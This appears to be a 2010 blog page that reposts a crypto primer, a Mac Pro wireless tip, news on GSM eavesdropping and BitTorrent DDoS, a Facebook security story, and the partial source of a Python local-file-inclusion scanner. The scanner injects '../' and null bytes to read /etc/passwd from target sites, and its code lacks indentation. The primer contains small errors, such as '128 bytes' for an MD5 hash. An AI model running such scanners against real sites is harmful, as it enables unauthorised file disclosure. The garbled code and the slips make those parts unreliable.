Jumat, 31 Desember 2010

Crypto Primer: Understanding encryption, public/private key, signatures and certificates

by Plankytronixx

So much of what I will write on this blog will assume a knowledge of crypto. I thought I’d create a post I could reference back to for many future posts to keep things simple and easy to understand.


Algorithms and keys

We all know what an algorithm is. In cryptography it’s not the algorithm you keep secret. The algorithm should be designed in such a way that if it is discovered, unless the snooper has the key, it is useless to him/her. Many algorithms are publicly published. Key secrecy is what’s important. It even goes as far as to say that if you know the algorithm, in other words, you know what mathematics was used and you also know the ciphertext itself, a good encryption algorithm will still keep the plaintext data secret! It sounds impossible because if somebody told me “the answer is 27 and I know to get that number the algorithm divided by 10, added 4 then multiplied by 3”, I’d be able to pretty quickly calculate the input was 50. But these algorithms use special one-way functions (which we’ll look at in a moment) which make that impossible (or at least so difficult you’d never bother to attempt it) to do.

There are 2 broad classes of algorithm – symmetric and asymmetric. Symmetric algorithms use the same key for both encryption and decryption. Asymmetric algorithms, such as public/private key cryptography use one key for encryption and a different, though mathematically related key for decryption. That last sentence sounds counter-intuitive. As does the idea that publishing your algorithm still maintains secrecy. But that’s the truth. Of course an algorithm is only secure until/if somebody finds a weakness.

There is a scenario known as the doomsday scenario. This is the day somebody publishes an algorithm for predicting prime numbers. Almost the entirety of public/private key cryptography (used by protocols such as SSL/TLS) is based on the notion that there is no pattern to a series of prime numbers, other than that they are prime.
There is a possibility that somebody has already come up with a prime-prediction algorithm. It would certainly be in their interest to keep it secret!

The encryption algorithm has 2 inputs – plaintext and the key. It has one output, ciphertext.

If decrypting data, 2 inputs: ciphertext and the key. It has one output, plaintext. 

One Way Functions

Mathematical functions where it is difficult (or impossible) to get back to the source values, knowing only the output values, are known as one-way functions. There are many, but modular arithmetic gives us a method that is used extensively in cryptography. 

A simple example is where, on a 12 hour clock face, you add 5 hours to 9am. The answer is 2 pm. Or written down we could say:

9+5=2
 
Because this is an example of modular arithmetic where the modulus is 12, we’d actually write:

9+5=2(mod12)

Let’s take a simple function: 

3x where x=2

This is a function for turning 2 in to 9, because  it’s the same as 3 * 3, which equals 9. There is a direct relationship between the magnitude of x and the magnitude of the function result. Using modular arithmetic can give the function a great property – unpredictability.
x 1 2 3 4 5 6
3x 3 9 27 81 243 729
3x(mod7) 3 2 6 4 5 1
Your password in Windows is stored as a one way function – albeit one that is considerably more complex than what you’ve just seen.

Hashes

There are some very useful algorithms that produce fixed length strings. For example it doesn’t matter how much data you feed in to an MD4 hashing algorithm, you’ll always get a 128 bit string out of it. That means there must be rather a lot of input strings that will produce exactly the same output strings – and indeed there are; they’re called collisions;  they are so rare, you might as well consider them to never happen, in just the same way you are very unlikely to ever have 2 GUIDs of the same value if the programming framework you use has true randomness and a uses big enough numbers for GUIDs. MD4 is a complicated one-way function, so predicting collisions is, to all intents and purposes, impossible. Unless you keep trying and comparing the output strings. This is, in theory the only way to find out. It’s called a brute force attack. You just use computing power to very quickly run through all possible combinations. This could take a long time. A very long time. Hashes are very useful because they allow you to perform comparisons very quickly. If you have a large message, you can create an MD4 hash of the message and send the hash to somebody over a slow network. They can then run a hash on data they hold, which they believe to be identical and compare the hash you sent them, with the one they just generated. If they are the same, it means the 2 datasets are the same.

So say if I take the string “1” and put it through hashing functions – I’ll end up with:
MD4: 8BE1EC697B14AD3A53B371436120641D
MD5: C4CA4238A0B923820DCC509A6F75849B
However, if I take the string “2”, which is numerically almost identical to the first string – I’ll get massively different results.
MD4: 2687049D90DA05D5C9D9AEBED9CDE2A8
MD5: C81E728D9D4C2F636F067F89CC14862C
All this stuff comes in very useful with digital signatures which I’ll describe a little later.

Key Distribution

The problem with encrypting/decrypting data in the way I’ve told you so far, is that you have to somehow get the decryption key safely to your partner. It could easily be intercepted in this day of us all being permanently online. It’s the age-old problem that generals have had of communicating with their officers in the field for centuries. If the messenger who has the key is captured, all your communication can be decrypted, whether or not subsequent messengers know the key. This is called the key distribution problem.
 
3 mathematicians came up with an answer to this problem: Diffie, Hellman and Merkle. They do an exchange of data which can be intercepted by anybody but which allows both sender and receiver to generate the same key but doesn’t allow the interceptor to generate the key. Sounds incredible? It’s very simple to explain, now that you understand modular arithmetic.
 
Follow the steps 1 through 4. In the last step both Alice and Bob have the same key: 9. From this point on they can use 9 as their encryption and decryption key. All I can tell you is that it works. Why it works I have no idea – I am very poorly educated! However, I’m happy to live with the fact that it just works.  If it’s beyond you, you’re not alone. Maybe you are also poorly educated! I do think it’s really clever, neat and cool though.

Asymmetric Key Encryption

We use one key to encrypt, and a related key to decrypt data. You can actually swop the keys round. But the point is you don’t have one key. This gets round the key distribution problem. There’s a great way of describing the difference between symmetric and asymmetric key encryption. It involves the use of a box to put messages in and we have to assume the box, its clasps and the padlock used to lock it are impossible to penetrate.

Symmetric Key: You send a messenger out with a copy of the key. He gets it to your recipient who lives 10 miles away. On the way he stops at a pub and has his pocket picked. The key is whisked off to a locksmith who copies it and it is then secreted back in to the messenger’s pocket.

Some time later you send a messenger with the box containing your message. You are confident that your recipient is the only one who can read the message because the original messenger returned and reported nothing unusual about the key. The second messenger stops at the same pub. He is pick-pocketed. The copy key is used to unlock the box and read the message. The box with its message intact is secreted back in to the messenger’s pocket. You and your recipient have no idea that your communication has been compromised. There is no secrecy…

Asymmetric Key: Your recipient has a padlock and key. He keeps the key in a private place about his person. Let’s therefore call it a private key. He puts the padlock in to the box, but leaves it unlocked. He doesn’t mind if anybody sees the padlock. It’s publicly viewable. Even though it’s not really a key, let’s call it a public key. He sends a messenger to you with the box. The messenger stops at the pub and is pick pocketed. All the snoopers see is an open padlock. They secretly return the box. The messenger arrives at your door. You take the padlock out of the box and put your message in to it. You use the open padlock to lock the box, snapping it shut and you send the messenger on his way. He again stops at the pub and is pick-pocketed. They find only a padlocked box. No key. They have no way of getting in to the box. They secretly return the box to the messenger’s pocket. The messenger gets to your recipient, who use the key he secreted  in a private place about his person (the private key) and uses it to unlock the padlock and read the message. Secrecy is maintained.

You can see the process is a bit more complicated for asymmetric key than for symmetric key, so it’s not something you’d want to do often. So what is often done is that instead of putting a message in the box and padlocking it, a symmetric key is put in the box and padlocked. That way, you solve the key distribution problem. That’s what happens with computer cryptography mostly. Public/private key cryptography is used to transport a symmetric key that is used for message exchanges. One reason for doing this is that asymmetric key crypto, or public/private key crypto, as it is known, is expensive, in terms of computing power, whereas symmetric key crypto is much more lightweight. When you see that a web site uses 256 bit encryption, they are talking about the symmetric key that is used  after the public/private key crypto was used to transport the symmetric key from sender to receiver. Often the key lengths for public/private key cryptography is 2048 bits. You may have found yourself confused when setting up IIS with 256 bit SSL encryption and seeing keys of 1024 or 2048 bits. This is why – it’s the difference between what’s called the session key and the public/private keys.


 

Although the diagram above explains how 2 keys are used, where does all this public and private key malarkey come in to play?

Let’s take the example of an ecommerce web server that wants to provide SSL support so you can send your credit card details securely over the Internet. Look at the public and private keys in the following diagram.
The public and private keys are held on the ecommerce web server. The private key is heavily protected in the keystore. Many organisations will go as far as to have a special tamper-proof hardware device to protect their private keys. The public key doesn’t need to be protected because it’s, well, public. You could have daily printouts of it in the newspapers and have it broadcast every hour, on the hour, on the radio. The idea is that it doesn’t matter who sees it.

The website generates the public and private keys. They have to be generated as a key-pair because they are mathematically related to each other. You retrieve the public key from the website and use it as your encryption key. You’re not just going to send your credit card information across the Internet yet. You’re actually going to generate a symmetric key and that is going to become the plain-text input data to the asymmetric encryption algorithm. The cipher-text will traverse the Internet and the ecommerce site will now use its private key to decrypt the data. The resulting output plain-text will be the symmetric key you sent. Now that both you and the ecommerce site have a symmetric key that was transported secretly, you can encrypt all the data you exchange. This is what happens with a URL that starts https://.
There are still a couple of problems to solve here, but let’s put them on to the back-burner for a little while. We need to understand digital signatures and certificates for those problems. In the meantime let’s have a peek at the mathematics inside the public/private key algorithm. There is an interesting little story-ette around this algorithm. A researcher at the UK’s GCHQ called Clifford Cocks invented the algorithm in 1973. However, working for GCHQ, his work was secret, so he couldn’t tell anybody. About 3 years later, 3 mathematicians, Ron Rivest, Adi Shamir and Leonard Adelman also invented it. They went on to create the security company RSA (which stands for Rivest, Shamir and Adelman). It is said the RSA algorithm is the most widely used piece of software in the world.
First, we’ll generate the public key. We pick 2 random giant prime numbers. In this case, I’ll pick 2 small primes to keep it simple; 17 and 11. We multiply them to get 187. We then pick another prime; 7. That’s our public key – 2 numbers. Pretty simple.
Now we use the public key to generate the private key. We run it through the algorithm in the diagram above. You can see we use modular arithmetic. Obviously the numbers would be massive in real life. But here, we end up with a private key of 23. The function, 7 * d = 1(mod 160) has that look of simplicity, but it’s not like that at all. With large numbers we’d need to use the Extended Euclidean Algorithm. I have to say, my eyes glazed over and I was found staring in to the distance when I read this about it:

The extended Euclidean algorithm is particularly useful when a and b are coprime, since x is the modular multiplicative inverse of a modulo b.

Now we want to use that to encrypt a message.
To keep things simple, we’ll send a single character; “X”. ASCII for X is 88. As we are the sender, we only know the public key’s 2 values: 187 and 7, or N and e. Running 88 through the simple algorithm gives us the value 11. We send the ciphertext value 11 to the ecommerce web server.

The Web server has access to the private key, so it can decrypt the ciphertext.
The web server passes the plaintext through the algorithm shown above and gets us the original “X” that was sent. The bit that says :
Plaintext = 1123(mod 187)

OK – there’s actually a problem here. In this message, every “X” would come out in ciphertext as the value 11. We could perform a frequency analysis attack on the message. In the English language, certain letters tend to appear more frequently than others. The letters “e” and “i” for example are very common, but “x” and “z” are uncommon.

There is a “signature” that could be used to find the content of a message. We therefore need to encrypt much larger blocks of data than just one byte at a time.

Digital Signatures

Asymmetric keys, as mentioned earlier can be swopped around. If you use one key for encryption, you must use the other key for decryption. This feature comes in very handy for the creation of digital signatures. You’ve heard of digitally signed documents, authenticode, digitally signed applications, digital certificates and so on.
In the diagram you can see all we’ve done is combined some plaintext in to the same “message” as its equivalent ciphertext. When it’s time to check a digital signature, we reverse the process :

To check a message, we decrypt the encrypted portion, and get back plain text. We then compare that to the plain text in the message. If the 2 sets of plain text are different, it means either:
  • The plaintext in the message has been altered and that accounts for the difference.
  • The ciphertext in the message has been altered and that accounts for the difference.
  • They have both been altered and that accounts for the difference.
In order to have a consistent message, the attacker would need to have access to the key that was used to generate the ciphertext.

Do you remember earlier, I talked about hashes? Well, because a message might be quite large, it’s often best to generate a hash of the message and encrypt that. If it’s an MD5 hash, it means you’ll only have to encrypt 128 bytes. When you come to perform the validation of the signature, you have to take the plain text portion and generate a hash before you do the comparison. It just uses the CPU more efficiently.
In this case, the message consists of a small section of ciphertext because the string-size of the input plaintext was reduced through hashing before it was encrypted. It also includes the plaintext of the message.

Depending on the data you are looking at, you’ll often even find the keys you can use to decrypt the message in plaintext within the message body. It seems like complete madness because anybody who intercepts the message could simply modify the plaintext portion of the message and then use the included key to generate a new ciphertext equivalent. That would make the message consistent.

However, if the plaintext key included in the message is the message-issuer’s public key, then the attacker would need access to the corresponding private key, which they won’t get because it’s, well, private.

But even with this there is still a problem. How do you know the message came from the sender it purports to come from? As an attacker, I could easily generate my own key-pair. I could then create a message that says I am the issuer and use my private key to create the encrypted part of the message.

When you come to check the message you’ll know that it definitely wasn’t tampered with in transit, but how do you know you can trust the public key embedded in to the message? How do you know that it’s me that created the message. That’s where digital certificates come in to play.

Certificates

Certificates are data structures that conform to a specification: X.509. But really they are just documents that do what we just talked about. The plain text data is the public key, plus other distinguishing information like the issuer, the subject name, common name and so on. It is then hashed and the hash is encrypted using the private key of a special service called a certification authority (CA) – a service that issues certificates.

When we protect a web server with an SSL certificate, we go through a 2 stage process. generating a certificate request, and then finishing it off by receiving and installing the certificate. The request part, generates a public and private key. The public key plus the distinguishing information is sent to the CA, which then creates a digitally signed document, signed using the CA’s private key. The document conforms to X.509 certificate standards. The certificate is returned by the CA, and we install it on our web server.

Anytime anybody connects to the web server over SSL, they retrieve the certificate and perform a signature validation on it. Remember it was signed by the CA’s private key. So they have to have the CA’s public key to perform the validation. If you go in to Internet Explorer’s Internet Options and then to the Content tab, you’ll se a Certificates button. That shows you all the CAs you have certificates (and therefore public keys) for. It means if you see a certificate that was signed by a CA on a web site, in theory, the CA did a check to make sure the requester was indeed the requester before issuing the certificate. It means that you have to trust that the CA did a good job of checking the requester’s validity before issuing the certificate.

Even this creates a minor problemette – how do you know the CA’s certificate wasn’t created by an imposter of some description? Well, it can have its certificate signed by a CA higher up the food-chain than itself. Eventually you get to a CA at the top of the food chain and this is called a Root CA. Internet Explorer and all the other browsers have all the main Root CAs for the Internet built-in. These are trusted organisations. They have to be! They are so trusted, they are able to sign their own certificates.

You may from time to time play with a Visual Studio command line tool called makecert.exe. It’s a tool that creates self-signed certificates. If you are just using them for development purposes on a local machine they are probably fine. You trust yourself, presumably. Sometimes you can use self-signed certificates on Internet-facing services. For example if you upload your own self-signed certificate to a service and you are sure nobody intercepted it while you were uploading it (because you were using SSL maybe), it means you can have private conversations with the service and you can be sure the service is the service you issued the certificate to. If you just sent the naked certificate, they’d be able to encrypt messages that only you could decrypt, because you’d have the private key. It’s possible to also include the private key when you create a certificate. If you send one of these certificates to an Internet service, they can digitally sign messages they send to you with your private key. Because you are assured that you gave the private key only to the service, you can be sure the messages are genuinely coming from that service and not an imposter. You have to trust that the service do a good job of keeping your private key safe.

Of course it wouldn’t be practical if every time you wanted to buy something on the Internet, in order to create an SSL connection you had to first upload a self-signed certificate. That’s why there is a large infrastructure of CAs and Root CAs built on the Internet. This infrastrucutre is called a Public Key Infrastructure or PKI. Many organisations have their own internal PKIs.


Above: Internet Explorer’s list of Trusted Root CAs.
You can also see the chain of CAs up to that chain’s corresponding Root CA when you look at a certificate.
This shows an expired certificate that was issued to my BPOS (Office 365) account by the CA called “Microsoft Online Svcs BPOS EMEA CA1”. Its certificate was in turn issued by “Microsoft Services PCA” which had its certificate issued by “Microsoft Root Certificate Authority”. As it’s a Root CA, it appears in the Trusted Root CAs container in Internet Explorer. As you walk up the chain you have to eventually get to a point where you trust the certificate. If you don’t, you’ll get a certificate error warning and a lot of messages advising you not to continue.


I’ll write another post soon that goes through a complete SSL handshake. That's a great way to explain what’s happening in crypto.



How to Make a Mac Pro Wireless

by Susie Ochs

I currently have four computers (one Mac G4 and three PCs) wired to a Netgear wireless router. I recently acquired a Mac Pro. Where I want to keep and use the new computer will make running a new cable impractical. I’ve asked several Mac users how to make the computer wireless, but they all have different answers. How does one make a Mac Pro wireless?

Current Mac Pros come with AirPort Extreme 802.11n wireless, already equipped. (You can double-check that the AirPort card is present in your Mac Pro by opening the System Profiler application and clicking AirPort in the column on the left.) Check your menu bar for the AirPort logo (it’s shaped like a baseball diamond), and click it to turn AirPort on. The Mac will scan for wireless networks, and if your Netgear router is in range, you can select it, enter your network’s password, and you’ll be connected.

Mac Pros have four PCI Express slots for adding expansion cards

 like this AirPort Extreme card sold by Other World Computing.

While current Mac Pros have that AirPort Extreme card standard, some previous Mac Pro models didn’t. When the Mac Pro was introduced in 2006, it came with two Ethernet ports (for wired connectivity) but the AirPort Extreme card was an optional add-on. It didn’t become standard until 2010. But you can still add an AirPort Extreme card to a Mac Pro that didn’t come with one. We recommend picking it up from Other World Computing, which sells the Apple AirPort Extreme 802.11n Wireless Mini-PCIe Card ($89.99). It comes with installation instructions, and you won’t even need any tools since the Mac Pro is so easy to open. That card’s 802.11n speeds are the fastest available for your Mac Pro, and once it’s installed, you’ll be able to connect to your router wirelessly.

Hackers crack open mobile network (GSM Sniffing)

Mobile calls and texts made on any GSM network can be eavesdropped upon using four cheap phones and open source software, say security researchers.

Karsten Nohl and Sylvain Munaut demonstrated their eavesdropping toolkit at the Chaos Computer Club Congress (CCC) in Berlin.

The work builds on earlier research that has found holes in many parts of the most widely used mobile technology.

The pair spent a year putting together the parts of the eavesdropping toolkit.

"Now there's a path from your telephone number to me finding you and listening to your calls," Mr Nohl told BBC News. "The whole way."

He said many of the pieces in the eavesdropping toolkit already existed thanks to work by other security researchers but there was one part the pair had to create themselves.

"The one piece that completed the chain was the ability to record data off the air," he said.

In a demonstration at the CCC, the pair took attendees through all the steps that led from locating a particular phone to seizing its unique ID, then leap-frogging from that to getting hold of data swapped between a handset and a base station as calls are made and texts sent.

Key to grabbing the data from the air were cheap Motorola phones which can have their onboard software swapped for an open source alternative.
 
"We used the cheap Motorola telephones because a description of their firmware leaked to the internet," he said.

This led to the creation of open source alternative firmware that, he said, has its "filters" removed so it could see all the data being broadcast by a base station.

This allows attackers to home in on the data they need to eavesdrop, said Mr Nohl. The encryption system that scrambles this data can be defeated using a huge list of encryption keys, called a rainbow table, that Mr Nohl generated in a separate research project.

"Any GSM call is fair game," he said.

GSM is the name of the technology used on the vast majority of mobile phone networks around the world. The GSMA, which represents operators and phone makers, estimates that there are more than five billion GSM mobiles in use around the world.

The GSMA has not responded to requests for comment about the research.

Playing around
Simeon Coney, a spokesman for mobile security firm Adaptive Mobile, said the work looked fairly thorough.

"Especially interesting is how the attack is aimed at a specific target phone, which could lead to malicious interest of high value targets," he added.

"This isn't an attack that is today readily repeatable yet by the anyone unfamiliar with the underlying technology," he said. "However, it does illustrate the manners in which the mobile phone system could be compromised in a focussed attack in less protected markets."

Mr. Nohl said that before now commercial equipment that could spy on calls cost upwards of £35,000. The kit demonstrated at the Berlin event cost far less than that, he said. For instance, the Motorola phones used to grab data cost only 10 euros (£9) each.

Despite showing off the entire eavesdropping kit, there were no plans to release all of it for others to use, said Mr. Nohl.

However, recreating the missing parts would not be difficult for a tech savvy amateur, he added.

"I expect people to do it for the fun of doing it."

Mr. Nohl said the motivation for carrying out the research was to create awareness around the problem and perhaps prompt operators to improve security.

A few simple steps could make it much harder for eavesdroppers, he said.

"Raising their awareness is the most likely outcome, but the technical changes would be better."

 This is sample simulation GSM Sniffing :
Download

BotTorrent? Using BitTorrent as a DDoS Tool

A recent talk at the Chaos Communications Congress revealed how BitTorrent swarms can be exploited to take down large websites with relative ease. A vulnerability in the technology behind so called trackerless torrents makes it possible for someone to trick downloaders of popular files into send thousands of requests to a webserver of choice, taking it down as a result. Basically, this turns BitTorrent into a very effective DDoS tool. 

BitTorrent is one of the most effective technologies to transfer large digital files to many people at once. Unlike a central server, transfers actually tend to go faster as more people share the same files. This characteristic is one of the reasons why it has evolved into the dominant file-sharing platform in recent years.


Every day millions of people are downloading files via BitTorrent, and in some instances more than 100,000 people are sharing the same file at the same time. These large ‘swarms’ of peers are great for sharing, but they also pose a threat as became apparent at the Chaos Communications Congress (CCC) recently.

In a talk titled “Lying To The Neighbours” it was shown that the DHT technology which powers “trackerless torrents” can be abused to let BitTorrent downloaders effectively DDoS a webserver of choice. DHT’s normal function is to find peers who are downloading the same files, but without communicating with a central BitTorrent tracker. This ensures that downloads can continue even when the central tracker goes offline.

According to the presenter who goes by the name ‘Astro’, Kademlia based DHT can be exploited by a malicious peer to carry out a DDoS attack. If there are enough peers downloading the same file, this could easily take down medium to large websites. The worrying part is that the downloaders who are participating in the DDoS will not be aware of what’s going on.

“The core problem are the random NodeIDs. The address hashing and verification scheme works for scenarios like the old Internet, but becomes almost useless in the big address space of IPv6,” Astro told TorrentFreak in a comment. As a result, any BitTorrent swarm can be abused to target specific websites and potentially take them down.

This and other DHT vulnerabilities are not entirely new concepts for BitTorrent developers. They have been discussed in various places already, but no agreement on how they should be dealt with has yet been reached.

Over the last months DDoS attacks have been in the news regularly, mostly carried out under the flag of Anonymous’ Operation Payback. Initially anti-piracy targets such as the MPAA and RIAA were taken offline, and last month the focus switched to organizations that acted against Wikileaks, including Mastercard and Paypal.

While these attacks required hundreds of people to actively participate and fire up their LOIC application at the same time, the BitTorrent DDoS could take down the same sites from a single computer, using BitTorrent downloads as a ‘botnet’. But, where there’s a problem there’s a solution, and Astro has some pointers for BitTorrent developers.

“Not connecting to privileged ports (< 1024) where most critical services reside," is one ad-hoc solution, but Astro says that since it's a design error, the protocol has to be redefined eventually.

The idea of using BitTorrent as a DDoS tool is not entirely new. In fact, researchers have previously shown that adding a webserver’s IP address as a BitTorrent tracker could result in a similar DDoS. The downside of this method is, however, that it requires a torrent file to become popular, while the DHT method can simply exploit existing torrents that are already being downloaded by thousands of people.

It will be interesting to see if BitTorrent developers are going to act upon the DHT vulnerability in the coming months and come up with a solution to prevent this kind of abuse.

Happy New Year :)

Facebook Scare Tactics Knocked by Security Pro

By John P. Mello Jr., PC World

Have you received a warning from Facebook that your account protection is "very low?" Don't panic. Your security settings may be stronger than Facebook would lead you to believe -- and that's ticked off one security expert. "The suggestion that users' accounts currently have a protection status of 'very low' is entirely misleading and stinks of scare tactics," declared Graham Cluley, a senior technology consultant with security software maker Sophos. 

Facebook has been contacting its members for several weeks now with its "very low" security protection warnings. In the alerts, the company includes a link. Click the link and you're taken to a page that requests additional personal information about you. Sound familiar? This is exactly the tactic used by Internet highwaymen to steal sensitive information from unwitting web users and plant malicious software on their computers.

"With fake antivirus (also known as scareware) attacks becoming an ever-growing problem (they attempt to trick you into believing your computer has a security problem when it doesn't), some security-conscious Facebook users might worry that this is a similarly-styled assault, designed to scare you into taking perhaps unwise actions," Cluley wrote at Sophos's Naked Security blog

In order to increase your account's security protection, Facebook asks for an alternative e-mail address, a mobile phone number, and an updated security question. You might be able to deduce what Facebook is up to by those requests. Its security protection warning isn't about security protection at all, but enabling its members to regain access to their accounts should they be compromised.  

"There's nothing necessarily wrong with Facebook giving its millions of users a way of verifying their identity should they lose access to their account, but clearly it should have been presented better and more thought should have gone into how this system was implemented," Cluley wrote. 

He suggests that a better approach to what Facebook is trying to accomplish would be a message such as, "We can help you recover your account if it gets hacked; want to know more?"
"I'm not going to tell you not to give Facebook the information they're requesting in this 'account protection' push, but I would suggest that you think carefully before doing so," he cautions.

Kamis, 30 Desember 2010

Simple Local File Inclusion Vulnerability Scanner

#!/usr/bin/python

# Simple Local File Inclusion Vulnerability Scanner
# by Valentin Hoebel ([email protected])
# Version 1.0 (29th December 2010)

# ASCII FOR BREAKFAST

# ---------- [Description]
# This tool helps you to find LFI (Local File Inclusion) vulnerabilities.

# ---------- [Features]
# - This time with working random user agents ^_^
# - Checks if a connection to the target can be established
# - Some error handling
# - Scans an URL for LFI vulnerabilities
# - Finds out how a possible LFI vulnerability can be exploited (e.g. directory depth)
# - Supports nullbytes
# - Supports common *nix targets, but no Windows systems.
# - Creates a small log file.
# Supports no SEO URLs, such as www.example.com/local-news/
# But in most cases it is possible to find out the real URL and pass it to this script.

# ---------- [Usage example]
# ./lfi_scanner.py --url="http://www.example.com/page.php?url=main"

# ---------- [Known issues]
# - This tool is only able to find "simple" LFI vulnerabilities, but not complex ones.
# - Like most other LFI scanners, this tool here also has trouble with
# handling certain server responses. So this tool does not work with every website.

# ---------- [Tested with]
# Targets: Apache2 servers and PHP websites, various Linux systems
# Script platform: Ubuntu Lucid Lynx and Python 2.6.5

# ---------- [Notes]
# - This tool was developed using a Python 2.6.5 interpreter.
# - I admit: This tool is a little bit slow and not very efficient (too many variables etc.). Sorry about that :P
# - Modify, distribute, share and copy this code in any way you like!
# - Please note that this tool was created and published for educational purposes only, e.g. for pentesting
# your own website. Do not use it in an illegal way and always know + respect your local laws.
# I am not responsible if you cause any damage with it.

# ---------- [Changelog]
# - Version 1.0 (29th December 2010):
# - Initial release

# Power to the cows!

import getopt, sys, random, urllib, urllib2, httplib, re, string, os
from urllib2 import Request, urlopen, URLError, HTTPError
from urlparse import urlparse
from time import gmtime, strftime

def print_usage():
print_banner()
print "[!] Wrong argument and parameter passed. Use --help and learn how to use this tool :)"
print "[i] Hint: You need to pass a value for --url=\"\" ."
print "[i] Example: ./lfi_scanner.py --url=\"http://www.example.com/page.php?file=main\" "
print ""
print ""
sys.exit()
return

def print_help():
print_banner()
print "((Displaying the content for --help.))"
print ""
print "[Description]"
print "The Simple Local File Inclusion Vulnerability Scanner"
print "helps you to find LFI vulnerabilities."
print ""
print "[Usage]"
print "./lfi_scanner.py --url=\"\" "
print ""
print "[Usage example]"
print "./lfi_scanner.py --url=\"http://www.example.com/page.php?file=main\" "
print ""
print "[Usage notes]"
print "- Always use http://...."
print "- This tool does not work with SEO URLs, such as http://www.example.com/news-about-the-internet/."
print " If you only have a SEO URL, try to find out the real URL which contents parameters."
print ""
print "[Feature list]"
print "- Provides a random user agent for the connection."
print "- Checks if a connection to the target can be established."
print "- Tries to catch most errors with error handling. "
print "- Scans for LFI vulnerabilities. "
print "- Finds out how a possible LFI vulnerability can be exploited (e.g. directory depth)."
print "- Supports nullbytes!"
print "- Supports common *nix targets, but no Windows systems."
print "- Creates a small log file."
print ""
print "[Some notes]"
print "- Tested with Python 2.6.5."
print "- Modify, distribute, share and copy the code in any way you like!"
print "- Please note that this tool was created for educational purposes only."
print "- Do not use this tool in an illegal way. Know and respect your local laws."
print "- Only use this tool for legal purposes, such as pentesting your own website :)"
print "- I am not responsible if you cause any damage or break the law."
print "- Power to teh c0ws!"
print ""
print ""
sys.exit()
return

def print_banner():
print ""
print ""
print ""
print "Simple Local File Inclusion Vulnerability Scanner"
print "by Valentin Hoebel ([email protected])"
print ""
print "Version 1.0 (29th December 2010) ^__^"
print " (oo)\________"
print " (__)\ )\/\ "
print " ||----w |"
print "Power to teh cows! || ||"
print "____________________________________________________"
print ""
return

def test_url(scan_url):
print ""
print "[i] Assuming the provided data was correct."
print "[i] Trying to establish a connection with a random user agent..."

user_agents = [
"Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en)",
"Mozilla/3.01 (Macintosh; PPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)",
"Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
"Opera/8.00 (Windows NT 5.1; U; en)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19"
]
user_agent = random.choice (user_agents)
check=""

request_website = urllib2.Request(scan_url)
request_website.add_header('User-Agent', user_agent)

try:
check = urllib2.urlopen(request_website)
except HTTPError, e:
print "[!] The connection could not be established."
print "[!] Error code: ", e
print "[!] Exiting now!"
print ""
print ""
sys.exit(1)
except URLError, e:
print "[!] The connection could not be established."
print "[!] Reason: ", e
print "[!] Exiting now!"
print ""
print ""
sys.exit(1)
else:
print "[i] Connected to target! URL seems to be valid."
print "[i] Jumping to the scan feature."
return


def scan_lfi(scan_url):
# Define all variables of this function
parameters = {}
original_value_of_tested_parameter = ""
check_value_of_tested_parameter = ""
check_value_of_tested_parameter_with_nullbyte = ""
lfi_found = 0
param_equals = "="
param_sign_1 = "?"
param_sign_2 = "&"
nullbyte = ""
one_step_deeper = "../"
for_changing_the_dump_file_name = "_"
max_depth = 20
i = 0
nullbyte_required = 1
depth = 0
query_string = ""
modified_query_string = ""
lfi_url_part_one = ""
lfi_url_part_two = ""
lfi_url_part_three = ""
lfi_url_part_four = ""
lfi_url = ""
find_nasty_string = "root:x:0:0:"
find_nasty_string_2 = "mail:x:8:"
user_agents = [
"Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en)",
"Mozilla/3.01 (Macintosh; PPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)",
"Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
"Opera/8.00 (Windows NT 5.1; U; en)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19"
]
user_agent = random.choice (user_agents)
lfi_response=""
lfi_response_source_code = ""
replace_string = ""
replace_string_2 = ""
replace_me = ""
exploit_depth= 0
folder_name = ""
cd_into = ""
log_file_name = ""
local_file = "etc/passwd"
local_file_for_first_test = "/etc/passwd"
lfi_exploit_url = ""

# We have to split up the URL in order to replace the value of the vulnerable parameter
get_parsed_url = urlparse(scan_url)
print "[i] IP address / domain: " + get_parsed_url.netloc

if len(get_parsed_url.path) == 0:
print "[!] The URL doesn't contain a script (e.g. target/index.php)."
else:
print "[i] Script:", get_parsed_url.path
if len(get_parsed_url.query) == 0:
print "[!] The URL doesn't contain a query string (e.g. index.php?var1=x&controller=main)."
else:
print "[i] URL query string:", get_parsed_url.query
print ""

# Finding all URL parameters
if param_sign_1 in scan_url and param_equals in scan_url:
print "[i] It seems that the URL contains at least one parameter."
print "[i] Trying to find also other parameters..."

# It seems that there is at least one parameter in the URL. Trying to find out if there are also others...
if param_sign_2 in get_parsed_url.query and param_equals in get_parsed_url.query:
print "[i] Also found at least one other parameter in the URL."
else:
print "[i] No other parameters were found."

else:
print ""
print "[!] It seems that there is no parameter in the URL."
print "[!] How am I supposed to find a vulnerability then?"
print "[!] Please provide an URL with a script and query string."
print "[!] Example: target/index.php?cat=1&article_id=2&controller=main"
print "[!] Hint: I can't handle SEO links, so try to find an URL with a query string."
print "[!] This can most likely be done by having a look at the source code (rightclick -> show source code in your browser)."
print "[!] Exiting now!"
print ""
print ""
sys.exit(1)

# Detect the parameters
# Thanks to atomized.org for the URL splitting and parameters parsing part!
parameters = dict([part.split('=') for part in get_parsed_url[4].split('&')])

# Count the parameters
parameters_count = len(parameters)

